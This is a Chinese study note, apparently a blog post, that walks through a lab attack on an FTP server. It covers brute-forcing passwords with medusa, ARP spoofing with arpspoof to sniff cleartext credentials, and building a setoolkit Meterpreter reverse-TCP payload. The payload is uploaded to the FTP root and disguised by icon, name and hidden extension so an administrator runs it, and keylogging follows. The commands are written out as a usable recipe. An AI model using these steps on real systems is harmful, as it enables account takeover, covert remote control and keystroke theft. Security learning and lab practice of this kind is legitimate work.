记录今日学习--FTP嗅探与简易制作Payload

FTP暴力破解密码

首先建立账户,使用 net user username password /add 建立用户
然后 net localgroup administrators username /add 将用户加入管理员组
在FTP站点中加入新建立的用户,允许其远程登陆—服务器准备工作配置完毕

在kali中下载medusa // 使用 sudo apt-get install medusa 安装
在这里插入图片描述
安装后 需要准备一个密码文件 如pass.txt 将正确的密码放入其中(或者字典)
使用命令 medusa -h IP -u username -P pass.txt -M ftp
后面这个ftp是模块的意思 可使用medusa -d 查看模块

FTP明文用户名、密码嗅探

FTP明文用户名、密码嗅探:
在用户名与密码传输的过程中,可以使用wireshark进行嗅探(也可以添加ftp作为过滤)
在此之前 利用arpspoof 进行arp欺骗
arpspoof -i eth0 192.168.1.1 -t 192.168.1.105 -i eth0 指的是网卡 要欺骗的目标是1.105 欺骗的1.105,让报文发送到kali而不是网关1.1

FTP登陆之后可以做的事情

可以利用 matasploit 创建反弹shell上传到FTP服务器。
可以利用setoolkit快速生成反弹shell,当管理员点击shell之后,后端就可以弹出cmd窗口

  1. 首先,输入setoolkit
  2. 选择Social-Engineering Attacks
  3. 选择Create a Payload and listen
  4. 选择Windows Reverse_TCP Meterpreter
  5. 输入Listener的IP(谁监听):(可以用ifconfig查看)
  6. 输入监听的端口:(不要选择常用端口,可以利用netstat -pantu 查看目前的端口被占用情况)
  7. 然后就会自动生成payload(在/root/.set/payload.exe),开始监听
  8. 移动payload 到桌面 mv /root/.set/payload.exe /root/Desktop
  9. 利用win下面的FlashFXP工具/命令行工具将文件上传到c:/inetpub/ftproot下面(自己做实验可以复制过去)
  10. 诱惑管理员点击payload 可以修改图标、重命名、隐藏后缀等
  11. kali出现对应连接
  12. 输入sessions -l进行查看
  13. 输入sessions -i 数字 选择对应的数字选择session
  14. 就可以开始执行命令了,也可以进行键盘记录(keyscan_start) 对应通过keyscan_dump 查看键盘记录
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值